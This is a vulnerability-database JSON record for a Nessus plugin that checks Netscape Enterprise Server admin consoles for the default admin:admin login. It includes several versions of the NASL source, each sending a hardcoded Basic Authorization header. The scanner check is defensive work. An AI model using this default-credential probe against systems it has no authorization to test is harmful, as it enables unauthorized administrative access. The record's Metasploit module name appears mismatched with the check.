{"id": "DDI_NETSCAPE_ENTERPRISE_DEFAULT_ADMINISTRATIVE_PASSWORD.NASL", "bulletinFamily": "scanner", "title": "Netscape Enterprise Default Administrative Password", "description": "This host is running Netscape Enterprise Server. The administrative interface for this web server is using the default username and password of 'admin'. An attacker can use this to reconfigure the web server, cause a denial of service condition, or gain access to this host.", "published": "2003-01-22T00:00:00", "modified": "2018-06-13T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=11208", "reporter": "Tenable", "references": [], "cvelist": ["CVE-1999-0502"], "type": "nessus", "lastseen": "2018-09-01T23:42:35", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:netscape:enterprise_server"], "cvelist": ["CVE-1999-0502"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This host is running Netscape Enterprise Server. The administrative interface for this web server is using the default username and password of 'admin'. An attacker can use this to reconfigure the web server, cause a denial of service condition, or gain access to this host.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "6280118abbbd1962ed7fc52fc6e8484f25a32cdb109a5e0881534b6e86bec0c7", "hashmap": [{"hash": "f30dcde820d74d06c44e89b1aea48cc1", "key": "cpe"}, {"hash": "7eb531fab9baccff0d26d8bcaaef08b3", "key": "cvelist"}, {"hash": "8c83b45fe3314d874ecb5ca06a6853a9", "key": "href"}, {"hash": "bea5b83d3a056039813089e7aa7f7e9a", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "5299677d29a0b2004584ce465e834b3e", "key": "modified"}, {"hash": "fda8e40dc036fe94d2de7e8e2f04d215", "key": "title"}, {"hash": "0f7b2b6116974dd09c18819d572d0d3f", "key": "description"}, {"hash": "a9fdec0651ce29ae373f57a8811ed9a7", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "c3cfa671ed1d1d7a82d3bb037beeb99f", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=11208", "id": "DDI_NETSCAPE_ENTERPRISE_DEFAULT_ADMINISTRATIVE_PASSWORD.NASL", "lastseen": "2018-08-30T19:37:00", "modified": "2018-06-13T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "11208", "published": "2003-01-22T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# This script was written by Forrest Rae <forrest.rae@digitaldefense.net>\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11208);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/06/13 18:56:26\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Netscape Enterprise Default Administrative Password\");\n script_summary(english:\"Netscape Enterprise Default Administrative Password\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a default set of administrative\ncredentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"This host is running Netscape Enterprise Server. The administrative\ninterface for this web server is using the default username and\npassword of 'admin'. An attacker can use this to reconfigure the web\nserver, cause a denial of service condition, or gain access to this\nhost.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Please assign the web administration console a difficult-to-guess\npassword.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:TF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/01/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:netscape:enterprise_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Digital Defense Inc.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencies(\"find_service1.nasl\", \"http_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/www\", 8888);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\ndebug = 0;\n\nports = add_port_in_list(list:get_kb_list(\"Services/www\"), port:8888);\n\nforeach port (ports)\n{\n\tif ( !get_port_state(port) ) continue;\n\tbanner = get_http_banner(port:port);\n\tif ( ! banner || (\"Netscape\" >!< banner && \"iPlanet\" >!< banner ) ) continue;\n\tsoc = http_open_socket(port);\n\n\tif (soc)\n\t{\n\n\t\t# HTTP auth = \"admin:admin\"\n\n\n\t\treq = http_get(item:\"/https-admserv/bin/index\", port:port);\n \t\treq = req - string(\"\\r\\n\\r\\n\");\n \t\treq = string(req, \"\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\n\\r\\n\");\n\n\n\t\tsend(socket:soc, data:req);\n\t\tbuf = http_recv(socket:soc);\n\t\thttp_close_socket(soc);\n\t\tif (isnull(buf)) continue;\n\n\t\tif(debug == 1) display(\"\\n\\n\", buf, \"\\n\\n\");\n\n\n\t\tif ((\"Web Server Administration Server\" >< buf) && (\"index?tabs\" >< buf))\n\t\t{\n\t\t\tsecurity_hole(port:port);\n\t\t}\n\t}\n}\n\n", "title": "Netscape Enterprise Default Administrative Password", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-08-30T19:37:00"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-1999-0502"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This host is running Netscape Enterprise Server. The administrative interface for this web server is using the default username and password of 'admin'. An attacker can use this to reconfigure the web server, cause a denial of service condition, or gain access to this host.", "edition": 2, "enchantments": {}, "hash": "d6a93334bd3bfabd79230adaa9d133aaa7f5d75ea3ab5e150d16cc29d4017e59", "hashmap": [{"hash": "7eb531fab9baccff0d26d8bcaaef08b3", "key": "cvelist"}, {"hash": "8c83b45fe3314d874ecb5ca06a6853a9", "key": "href"}, {"hash": "bea5b83d3a056039813089e7aa7f7e9a", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "fda8e40dc036fe94d2de7e8e2f04d215", "key": "title"}, {"hash": "c9f65a157ee0c008f49ceb824b338829", "key": "sourceData"}, {"hash": "0f7b2b6116974dd09c18819d572d0d3f", "key": "description"}, {"hash": "a9fdec0651ce29ae373f57a8811ed9a7", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "6561e7f0cbf888bba052bd3a00991a64", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=11208", "id": "DDI_NETSCAPE_ENTERPRISE_DEFAULT_ADMINISTRATIVE_PASSWORD.NASL", "lastseen": "2017-08-15T00:00:50", "modified": "2017-08-14T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "11208", "published": "2003-01-22T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# This script was written by Forrest Rae <forrest.rae@digitaldefense.net>\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11208);\n script_version(\"$Revision: 1.22 $\");\n script_cvs_date(\"$Date: 2017/08/14 14:06:24 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n script_osvdb_id(876);\n\n script_name(english:\"Netscape Enterprise Default Administrative Password\");\n script_summary(english:\"Netscape Enterprise Default Administrative Password\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a default set of administrative\ncredentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"This host is running Netscape Enterprise Server. The administrative\ninterface for this web server is using the default username and\npassword of 'admin'. An attacker can use this to reconfigure the web\nserver, cause a denial of service condition, or gain access to this\nhost.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Please assign the web administration console a difficult-to-guess\npassword.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:TF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/01/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:netscape:enterprise_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2017 Digital Defense Inc.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencies(\"find_service1.nasl\", \"http_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/www\", 8888);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\ndebug = 0;\n\nports = add_port_in_list(list:get_kb_list(\"Services/www\"), port:8888);\n\nforeach port (ports)\n{\n\tif ( !get_port_state(port) ) continue;\n\tbanner = get_http_banner(port:port);\n\tif ( ! banner || (\"Netscape\" >!< banner && \"iPlanet\" >!< banner ) ) continue;\n\tsoc = http_open_socket(port);\n\n\tif (soc)\n\t{\n\n\t\t# HTTP auth = \"admin:admin\"\n\n\n\t\treq = http_get(item:\"/https-admserv/bin/index\", port:port);\n \t\treq = req - string(\"\\r\\n\\r\\n\");\n \t\treq = string(req, \"\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\n\\r\\n\");\n\n\n\t\tsend(socket:soc, data:req);\n\t\tbuf = http_recv(socket:soc);\n\t\thttp_close_socket(soc);\n\t\tif (isnull(buf)) continue;\n\n\t\tif(debug == 1) display(\"\\n\\n\", buf, \"\\n\\n\");\n\n\n\t\tif ((\"Web Server Administration Server\" >< buf) && (\"index?tabs\" >< buf))\n\t\t{\n\t\t\tsecurity_hole(port:port);\n\t\t}\n\t}\n}\n\n", "title": "Netscape Enterprise Default Administrative Password", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 2, "lastseen": "2017-08-15T00:00:50"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This host is running Netscape Enterprise Server. The administrative interface for this web server is using the default username and password of 'admin'. An attacker can use this to reconfigure the web server, cause a denial of service condition, or gain access to this host.", "edition": 1, "enchantments": {}, "hash": "99768be175de18d950e28d5cffeda519b88789a90165da121988a6b4ce13ff46", "hashmap": [{"hash": "7eb531fab9baccff0d26d8bcaaef08b3", "key": "cvelist"}, {"hash": "8c83b45fe3314d874ecb5ca06a6853a9", "key": "href"}, {"hash": "bea5b83d3a056039813089e7aa7f7e9a", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "fda8e40dc036fe94d2de7e8e2f04d215", "key": "title"}, {"hash": "0f7b2b6116974dd09c18819d572d0d3f", "key": "description"}, {"hash": "c0e036f0b735289e03687c1f000fa3bb", "key": "sourceData"}, {"hash": "a9fdec0651ce29ae373f57a8811ed9a7", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "75fcd9b819be70f3c96fb4b4a93a6d2c", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=11208", "id": "DDI_NETSCAPE_ENTERPRISE_DEFAULT_ADMINISTRATIVE_PASSWORD.NASL", "lastseen": "2016-09-26T17:24:14", "modified": "2013-12-17T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "11208", "published": "2003-01-22T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# This script was written by Forrest Rae <forrest.rae@digitaldefense.net>\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11208);\n script_version(\"$Revision: 1.21 $\");\n script_cvs_date(\"$Date: 2013/12/17 12:13:59 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n script_osvdb_id(876);\n\n script_name(english:\"Netscape Enterprise Default Administrative Password\");\n script_summary(english:\"Netscape Enterprise Default Administrative Password\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a default set of administrative\ncredentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"This host is running Netscape Enterprise Server. The administrative\ninterface for this web server is using the default username and\npassword of 'admin'. An attacker can use this to reconfigure the web\nserver, cause a denial of service condition, or gain access to this\nhost.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Please assign the web administration console a difficult-to-guess\npassword.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/01/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:netscape:enterprise_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2013 Digital Defense Inc.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencies(\"find_service1.nasl\", \"http_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/www\", 8888);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\ndebug = 0;\n\nports = add_port_in_list(list:get_kb_list(\"Services/www\"), port:8888);\n\nforeach port (ports)\n{\n\tif ( !get_port_state(port) ) continue;\n\tbanner = get_http_banner(port:port);\n\tif ( ! banner || (\"Netscape\" >!< banner && \"iPlanet\" >!< banner ) ) continue;\n\tsoc = http_open_socket(port);\n\n\tif (soc)\n\t{\n\n\t\t# HTTP auth = \"admin:admin\"\n\n\n\t\treq = http_get(item:\"/https-admserv/bin/index\", port:port);\n \t\treq = req - string(\"\\r\\n\\r\\n\");\n \t\treq = string(req, \"\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\n\\r\\n\");\n\n\n\t\tsend(socket:soc, data:req);\n\t\tbuf = http_recv(socket:soc);\n\t\thttp_close_socket(soc);\n\t\tif (isnull(buf)) continue;\n\n\t\tif(debug == 1) display(\"\\n\\n\", buf, \"\\n\\n\");\n\n\n\t\tif ((\"Web Server Administration Server\" >< buf) && (\"index?tabs\" >< buf))\n\t\t{\n\t\t\tsecurity_hole(port:port);\n\t\t}\n\t}\n}\n\n", "title": "Netscape Enterprise Default Administrative Password", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:24:14"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:netscape:enterprise_server"], "cvelist": ["CVE-1999-0502"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This host is running Netscape Enterprise Server. The administrative interface for this web server is using the default username and password of 'admin'. An attacker can use this to reconfigure the web server, cause a denial of service condition, or gain access to this host.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "1dfd3a0dfbb850bf7e10ec8426b81e001c93dea1a84a2c00eb41446f379e8c63", "hashmap": [{"hash": "f30dcde820d74d06c44e89b1aea48cc1", "key": "cpe"}, {"hash": "7eb531fab9baccff0d26d8bcaaef08b3", "key": "cvelist"}, {"hash": "8c83b45fe3314d874ecb5ca06a6853a9", "key": "href"}, {"hash": "bea5b83d3a056039813089e7aa7f7e9a", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "fda8e40dc036fe94d2de7e8e2f04d215", "key": "title"}, {"hash": "c9f65a157ee0c008f49ceb824b338829", "key": "sourceData"}, {"hash": "0f7b2b6116974dd09c18819d572d0d3f", "key": "description"}, {"hash": "a9fdec0651ce29ae373f57a8811ed9a7", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "6561e7f0cbf888bba052bd3a00991a64", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=11208", "id": "DDI_NETSCAPE_ENTERPRISE_DEFAULT_ADMINISTRATIVE_PASSWORD.NASL", "lastseen": "2017-10-29T13:36:56", "modified": "2017-08-14T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "11208", "published": "2003-01-22T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# This script was written by Forrest Rae <forrest.rae@digitaldefense.net>\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11208);\n script_version(\"$Revision: 1.22 $\");\n script_cvs_date(\"$Date: 2017/08/14 14:06:24 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n script_osvdb_id(876);\n\n script_name(english:\"Netscape Enterprise Default Administrative Password\");\n script_summary(english:\"Netscape Enterprise Default Administrative Password\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a default set of administrative\ncredentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"This host is running Netscape Enterprise Server. The administrative\ninterface for this web server is using the default username and\npassword of 'admin'. An attacker can use this to reconfigure the web\nserver, cause a denial of service condition, or gain access to this\nhost.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Please assign the web administration console a difficult-to-guess\npassword.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:TF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/01/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:netscape:enterprise_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2017 Digital Defense Inc.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencies(\"find_service1.nasl\", \"http_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/www\", 8888);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\ndebug = 0;\n\nports = add_port_in_list(list:get_kb_list(\"Services/www\"), port:8888);\n\nforeach port (ports)\n{\n\tif ( !get_port_state(port) ) continue;\n\tbanner = get_http_banner(port:port);\n\tif ( ! banner || (\"Netscape\" >!< banner && \"iPlanet\" >!< banner ) ) continue;\n\tsoc = http_open_socket(port);\n\n\tif (soc)\n\t{\n\n\t\t# HTTP auth = \"admin:admin\"\n\n\n\t\treq = http_get(item:\"/https-admserv/bin/index\", port:port);\n \t\treq = req - string(\"\\r\\n\\r\\n\");\n \t\treq = string(req, \"\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\n\\r\\n\");\n\n\n\t\tsend(socket:soc, data:req);\n\t\tbuf = http_recv(socket:soc);\n\t\thttp_close_socket(soc);\n\t\tif (isnull(buf)) continue;\n\n\t\tif(debug == 1) display(\"\\n\\n\", buf, \"\\n\\n\");\n\n\n\t\tif ((\"Web Server Administration Server\" >< buf) && (\"index?tabs\" >< buf))\n\t\t{\n\t\t\tsecurity_hole(port:port);\n\t\t}\n\t}\n}\n\n", "title": "Netscape Enterprise Default Administrative Password", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2017-10-29T13:36:56"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:netscape:enterprise_server"], "cvelist": ["CVE-1999-0502"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This host is running Netscape Enterprise Server. The administrative interface for this web server is using the default username and password of 'admin'. An attacker can use this to reconfigure the web server, cause a denial of service condition, or gain access to this host.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "d8f3f9c73ec5bfc1d07ce5278f1b1c768c6745689decf8db00c0a5bee64774ce", "hashmap": [{"hash": "f30dcde820d74d06c44e89b1aea48cc1", "key": "cpe"}, {"hash": "7eb531fab9baccff0d26d8bcaaef08b3", "key": "cvelist"}, {"hash": "8c83b45fe3314d874ecb5ca06a6853a9", "key": "href"}, {"hash": "bea5b83d3a056039813089e7aa7f7e9a", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "5299677d29a0b2004584ce465e834b3e", "key": "modified"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "fda8e40dc036fe94d2de7e8e2f04d215", "key": "title"}, {"hash": "0f7b2b6116974dd09c18819d572d0d3f", "key": "description"}, {"hash": "a9fdec0651ce29ae373f57a8811ed9a7", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "c3cfa671ed1d1d7a82d3bb037beeb99f", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=11208", "id": "DDI_NETSCAPE_ENTERPRISE_DEFAULT_ADMINISTRATIVE_PASSWORD.NASL", "lastseen": "2018-06-14T07:16:51", "modified": "2018-06-13T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "11208", "published": "2003-01-22T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# This script was written by Forrest Rae <forrest.rae@digitaldefense.net>\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11208);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/06/13 18:56:26\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Netscape Enterprise Default Administrative Password\");\n script_summary(english:\"Netscape Enterprise Default Administrative Password\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a default set of administrative\ncredentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"This host is running Netscape Enterprise Server. The administrative\ninterface for this web server is using the default username and\npassword of 'admin'. An attacker can use this to reconfigure the web\nserver, cause a denial of service condition, or gain access to this\nhost.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Please assign the web administration console a difficult-to-guess\npassword.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:TF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/01/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:netscape:enterprise_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Digital Defense Inc.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencies(\"find_service1.nasl\", \"http_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/www\", 8888);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\ndebug = 0;\n\nports = add_port_in_list(list:get_kb_list(\"Services/www\"), port:8888);\n\nforeach port (ports)\n{\n\tif ( !get_port_state(port) ) continue;\n\tbanner = get_http_banner(port:port);\n\tif ( ! banner || (\"Netscape\" >!< banner && \"iPlanet\" >!< banner ) ) continue;\n\tsoc = http_open_socket(port);\n\n\tif (soc)\n\t{\n\n\t\t# HTTP auth = \"admin:admin\"\n\n\n\t\treq = http_get(item:\"/https-admserv/bin/index\", port:port);\n \t\treq = req - string(\"\\r\\n\\r\\n\");\n \t\treq = string(req, \"\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\n\\r\\n\");\n\n\n\t\tsend(socket:soc, data:req);\n\t\tbuf = http_recv(socket:soc);\n\t\thttp_close_socket(soc);\n\t\tif (isnull(buf)) continue;\n\n\t\tif(debug == 1) display(\"\\n\\n\", buf, \"\\n\\n\");\n\n\n\t\tif ((\"Web Server Administration Server\" >< buf) && (\"index?tabs\" >< buf))\n\t\t{\n\t\t\tsecurity_hole(port:port);\n\t\t}\n\t}\n}\n\n", "title": "Netscape Enterprise Default Administrative Password", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-06-14T07:16:51"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "f30dcde820d74d06c44e89b1aea48cc1"}, {"key": "cvelist", "hash": "7eb531fab9baccff0d26d8bcaaef08b3"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "0f7b2b6116974dd09c18819d572d0d3f"}, {"key": "href", "hash": "8c83b45fe3314d874ecb5ca06a6853a9"}, {"key": "modified", "hash": "5299677d29a0b2004584ce465e834b3e"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "bea5b83d3a056039813089e7aa7f7e9a"}, {"key": "published", "hash": "a9fdec0651ce29ae373f57a8811ed9a7"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "c3cfa671ed1d1d7a82d3bb037beeb99f"}, {"key": "title", "hash": "fda8e40dc036fe94d2de7e8e2f04d215"}, {"key": "type", "hash": 